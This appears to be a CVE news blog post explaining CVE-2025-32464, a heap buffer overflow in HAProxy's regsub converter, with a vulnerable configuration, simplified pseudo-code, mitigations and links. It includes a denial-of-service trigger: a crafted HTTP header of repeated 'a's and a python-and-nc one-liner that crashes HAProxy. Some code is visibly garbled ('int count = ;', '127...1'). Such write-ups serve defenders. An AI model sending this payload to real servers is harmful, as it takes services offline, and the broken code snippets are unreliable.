CVE CyberSecurity Database News

CVE-2025-32464 - HAProxy Buffer Overflow – What You Need to Know, How It Works, and Example Exploit

Poster -

HAProxy is a popular open-source load balancer and proxy server, widely used for distributing traffic in high-availability environments. While it's known for its stability and security, even top-tier software can have vulnerabilities. The new CVE-2025-32464 is an example of this: it's a heap-based buffer overflow in HAProxy versions 2.2 through 3.1.6, and while the flaw only affects "uncommon configurations," understanding its impact and exploitation is important — especially if you run HAProxy in more advanced setups.

Below, you’ll find everything you need to know about CVE-2025-32464, clear explanations, demonstration code, and links to in-depth resources.

1. Overview

CVE-2025-32464 is a security vulnerability found in HAProxy’s sample_conv_regsub() function. This function is responsible for substitutions using regular expressions (think: finding and replacing patterns in strings). Due to improper handling when certain rules are in place, replacing several short matching patterns with a longer string can overflow the buffer allocated for the result. This can be exploited for denial of service (crash), or in some cases, code execution.

2. Who Is Affected?

If you’re running HAProxy with default settings, you’re probably safe. This bug only happens in custom, less-common configurations – with specific usage of regsub in sample rules. Systems that heavily use regular expression substitution in request/response processing are at higher risk.

Example Configuration (at risk)

http-request set-var(req.user) regsub(req.fhdr(user-agent), '(a|b|c)','LONGPATTERN')

*Here, the regsub function replaces several short letters (a, b, and c) with a much longer string. This is a classic trigger for the bug.*

3. Technical Breakdown

The buggy code is inside the sample_conv_regsub() function, particularly how it allocates buffers for the substitution result. Instead of calculating the *maximum possible needed buffer*, it only calculates based on the pattern size or replacement size for a single match, and then applies it to multiple matches.

Code Simplified

// Pseudo-code/simplified logic
int regsub(char* input, char* pattern, char* replacement) {
    char buffer[256]; // size not sufficient if replacement much longer than matches
    int count = ;
    // iterate matches
    foreach (match in input) {
        // Copy pre-match to buffer
        // Write replacement (can be very long!)
        count++;
    }
    // If too many replacements, buffer overflows
}

4. Exploit Details & Example Code

Because this is a buffer overflow, remote code execution could be possible if an attacker can control both the input and the replacement (a rare situation). More realistically, this is a reliable denial of service: HAProxy process could crash, knocking services offline.

Vulnerable Configuration

frontend http-in
    bind *:80
    http-request set-var(txn.test) regsub(req.fhdr(test-header), '(a)','LONGPATTERN')
    default_backend servers

backend servers
    server s1 127...1:800

Trigger with

GET / HTTP/1.1
Host: example.com
test-header: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Because every 'a' matches the pattern, and each is replaced with 'LONGPATTERN', the output quickly outgrows the buffer.

Repeat with more 'a's to reliably crash HAProxy

python3 -c "print('GET / HTTP/1.1\r\nHost: example.com\r\ntest-header: ' + 'a'*200 + '\r\n\r\n')" | nc localhost 80

Remote Exploit

While code execution is unlikely without advanced heap manipulation, denial of service (crash) is straightforward with crafted requests.

5. Mitigations

- Upgrade to latest version (check https://www.haproxy.org/ for patches or updates past 3.1.6)
- Audit your configs: Avoid regsub operations that may replace many short matches with longer values.

Official HAProxy CVE Advisory:

https://www.haproxy.org/security/

CVE Description:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32464

Discussion Thread & Patch:

https://github.com/haproxy/haproxy/issues/2474

What is HAProxy regsub?

https://www.haproxy.com/blog/regular-expressions-in-haproxy/


Bottom line:
If you use HAProxy and have any regsub rules in your configuration, check them and upgrade ASAP. This issue is easy to avoid in most setups but can have severe impact if left unpatched.


*This post is original content for educational purposes. Watch for security advisories and always keep your software up to date!*

Timeline

Published on: 04/09/2025 03:15:16 UTC
Last modified on: 04/23/2025 22:15:15 UTC